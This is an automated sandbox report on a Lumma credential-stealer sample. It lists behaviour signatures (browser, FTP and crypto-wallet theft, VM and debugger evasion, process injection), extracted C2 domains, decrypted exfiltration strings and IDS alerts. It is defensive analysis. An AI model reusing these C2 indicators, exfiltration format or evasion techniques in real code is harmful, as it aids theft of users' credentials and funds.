Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9cOUjp7ybm.exe

Overview

General Information

Sample name:9cOUjp7ybm.exe
renamed because original name is a hash value
Original sample name:1abcde09d85b8ff8788f23afaf33674557563273df5961719bc65216aa3a1a95.exe
Analysis ID:1584118
MD5:7177b0ba961ddd258ee9672d436d6b63
SHA1:cdb7aef7f7a05430d323c00d43fe98af4680fa28
SHA256:1abcde09d85b8ff8788f23afaf33674557563273df5961719bc65216aa3a1a95
Tags:exeuser-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 9cOUjp7ybm.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\9cOUjp7ybm.exe" MD5: 7177B0BA961DDD258EE9672D436D6B63)
    • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop", "undesirabkel.click", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "cloudewahsj.shop"], "Build id": "LPnhqo--iicrrifofhfg"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1796834201.0000000002B39000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: aspnet_regiis.exe PID: 7696JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: aspnet_regiis.exe PID: 7696JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: aspnet_regiis.exe PID: 7696JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              Process Memory Space: aspnet_regiis.exe PID: 7696JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T09:42:00.348017+010020283713Unknown Traffic192.168.2.449736188.114.96.3443TCP
                2025-01-04T09:42:01.447291+010020283713Unknown Traffic192.168.2.449738188.114.96.3443TCP
                2025-01-04T09:42:03.107818+010020283713Unknown Traffic192.168.2.449740188.114.96.3443TCP
                2025-01-04T09:42:06.751225+010020283713Unknown Traffic192.168.2.449741188.114.96.3443TCP
                2025-01-04T09:42:07.911389+010020283713Unknown Traffic192.168.2.449742188.114.96.3443TCP
                2025-01-04T09:42:09.758036+010020283713Unknown Traffic192.168.2.449743188.114.96.3443TCP
                2025-01-04T09:42:11.141919+010020283713Unknown Traffic192.168.2.449744188.114.96.3443TCP
                2025-01-04T09:42:13.787834+010020283713Unknown Traffic192.168.2.449745188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T09:42:00.957953+010020546531A Network Trojan was detected192.168.2.449736188.114.96.3443TCP
                2025-01-04T09:42:02.320886+010020546531A Network Trojan was detected192.168.2.449738188.114.96.3443TCP
                2025-01-04T09:42:14.265404+010020546531A Network Trojan was detected192.168.2.449745188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T09:42:00.957953+010020498361A Network Trojan was detected192.168.2.449736188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T09:42:02.320886+010020498121A Network Trojan was detected192.168.2.449738188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T09:42:00.348017+010020585511Domain Observed Used for C2 Detected192.168.2.449736188.114.96.3443TCP
                2025-01-04T09:42:01.447291+010020585511Domain Observed Used for C2 Detected192.168.2.449738188.114.96.3443TCP
                2025-01-04T09:42:03.107818+010020585511Domain Observed Used for C2 Detected192.168.2.449740188.114.96.3443TCP
                2025-01-04T09:42:06.751225+010020585511Domain Observed Used for C2 Detected192.168.2.449741188.114.96.3443TCP
                2025-01-04T09:42:07.911389+010020585511Domain Observed Used for C2 Detected192.168.2.449742188.114.96.3443TCP
                2025-01-04T09:42:09.758036+010020585511Domain Observed Used for C2 Detected192.168.2.449743188.114.96.3443TCP
                2025-01-04T09:42:11.141919+010020585511Domain Observed Used for C2 Detected192.168.2.449744188.114.96.3443TCP
                2025-01-04T09:42:13.787834+010020585511Domain Observed Used for C2 Detected192.168.2.449745188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T09:41:59.845681+010020585501Domain Observed Used for C2 Detected192.168.2.4494811.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T09:42:07.275955+010020480941Malware Command and Control Activity Detected192.168.2.449741188.114.96.3443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://undesirabkel.click:443/apiKAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apirsAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/Avira URL Cloud: Label: malware
                Source: https://undesirabkel.click:443/apiAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click:443/apiEAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apiL7Avira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apia7p_=Avira URL Cloud: Label: malware
                Source: https://undesirabkel.click/dAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/aAvira URL Cloud: Label: malware
                Source: undesirabkel.clickAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apiamAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/api:5Avira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apiG5s_Avira URL Cloud: Label: malware
                Source: https://undesirabkel.click/apiAvira URL Cloud: Label: malware
                Source: https://undesirabkel.click/#Avira URL Cloud: Label: malware
                Source: 0.2.9cOUjp7ybm.exe.6ce30000.6.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop", "undesirabkel.click", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "cloudewahsj.shop"], "Build id": "LPnhqo--iicrrifofhfg"}
                Source: C:\Users\user\AppData\Roaming\gdi32.dllReversingLabs: Detection: 68%
                Source: 9cOUjp7ybm.exeReversingLabs: Detection: 65%
                Source: 9cOUjp7ybm.exeVirustotal: Detection: 66%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
                Source: 9cOUjp7ybm.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: cloudewahsj.shop
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: rabidcowse.shop
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: noisycuttej.shop
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: tirepublicerj.shop
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: framekgirus.shop
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: wholersorie.shop
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: abruptyopsn.shop
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: nearycrepso.shop
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: undesirabkel.click
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmpString decryptor: LPnhqo--iicrrifofhfg
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A5270 CryptUnprotectData,2_2_027A5270
                Source: 9cOUjp7ybm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: 9cOUjp7ybm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, WEREB44.tmp.dmp.4.dr
                Source: Binary string: C:\Users\user\Desktop\9cOUjp7ybm.PDBD{ source: 9cOUjp7ybm.exe, 00000000.00000002.1740123015.00000000008FA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WEREB44.tmp.dmp.4.dr
                Source: Binary string: n0C:\Windows\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740123015.00000000008FA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdbs source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WEREB44.tmp.dmp.4.dr
                Source: Binary string: \??\C:\Users\user\Desktop\9cOUjp7ybm.PDBr source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0040B810
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00405260
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00405260
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then mov ebx, eax0_2_003F63C0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then mov ebp, eax0_2_003F63C0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 6B77B5E1h0_2_00431480
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00405D70
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+esi]0_2_003F3670
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_003F7F20
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_003F7F20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_027A5270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0000022Ah]2_2_027A5270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx2_2_027B2A28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_027B3288
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0279CB18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h2_2_027D0BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_027CF950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_0279A9B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 6B77B5E1h2_2_027D0980
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7AAE27ECh]2_2_027B24ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_027A8C90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], ebx2_2_02799DEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]2_2_02798A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp+04h], eax2_2_02799240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_027BBAC4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_027CF2B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh2_2_027CC280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp eax, BFFFFFFFh2_2_027CC280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h2_2_027CC280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh2_2_027CC280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h2_2_027CC280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ecx+esi]2_2_02792B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_027B9B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_027CF350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]2_2_027C9B49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_027CF3E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+3Ch]2_2_027ABBA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+14h]2_2_027BC055
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_027CF040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_027AB839
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-11ACFC83h]2_2_02799814
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1A526408h]2_2_02799814
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax2_2_027958C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebp, eax2_2_027958C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_027BA0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp ecx2_2_027B796F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+69ABA241h]2_2_027B5784
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, ebx2_2_027B8150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_027B8150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_027CF130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_027A9980
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h2_2_027B3E61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_027BC675
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_027BC6D2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh]2_2_027CF6A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, ebx2_2_027BB693
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_027A4760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_027A4760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]2_2_027A4760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-74590DBEh]2_2_027A4760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+04h]2_2_027B6760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_027B6760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, ecx2_2_027B6740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_027B873A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-11ACFC83h]2_2_02799710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1A526408h]2_2_02799710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, ecx2_2_027A6711
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_027C4FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, ecx2_2_027A6FC4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax2_2_027A7FB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+69ABA241h]2_2_027B5784
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 6E87DD67h2_2_027C9460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], 31E2A9F4h2_2_027C9460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then test eax, eax2_2_027C9460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_02797420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_02797420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebp+00h], al2_2_027ADC10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h2_2_027D0CD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_027B8490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_027AAD10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_027BA500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_027AE5F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]2_2_027B1D90

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49743 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49736 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49744 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49742 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49738 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49745 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49740 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.4:49481 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49741 -> 188.114.96.3:443
